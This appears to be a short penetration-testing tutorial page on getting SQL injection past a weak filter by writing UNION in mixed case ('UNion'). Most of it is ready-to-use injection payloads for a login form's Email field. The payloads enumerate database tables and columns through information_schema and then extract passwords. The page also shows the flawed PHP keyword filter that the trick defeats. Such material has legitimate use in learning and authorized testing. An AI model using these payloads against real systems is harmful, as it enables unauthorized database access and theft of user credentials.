Bypassing SQL Filters

UNION Filters

Lets say we are testing a login form and it returns an error whenever we try to execute UNION SELECT. This suggest that there is a WAF filtering the queries so we would use Union instead.

Email=’ UNion select 1,2,3,concat(command,
"") -- -
Email=' UNion select
1,2,3,concat(table_name, "") FROM
information_schema.tables where
table_schema="databasename" limit 1,1 -- -
Email=' UNion select
1,2,3,concat(column_name, "")
FROM information_schema.columns where
table_name="tablename" limit 2,1 -- -
Email= ' UNion select
1,2,3,concat(password, “”) FROM
tablename limit 1,1 -- -

You can also use [GROUP_CONCAT] instead of [concat] as it combines entire column in one result.

[union] filter is below:

if(strpos($user,"UNION") ||
strpos($user,"INFORMATION_SCHEMA") ||
strpos($user,"union") ) { 
echo "Error"; die; 

Notice that the filter prohibits [“UNION”, “INFORMATION_SCHEMA”, and “union”] as characters hence if you modify on the [union] command a bit you can easily bypass it.

Last updated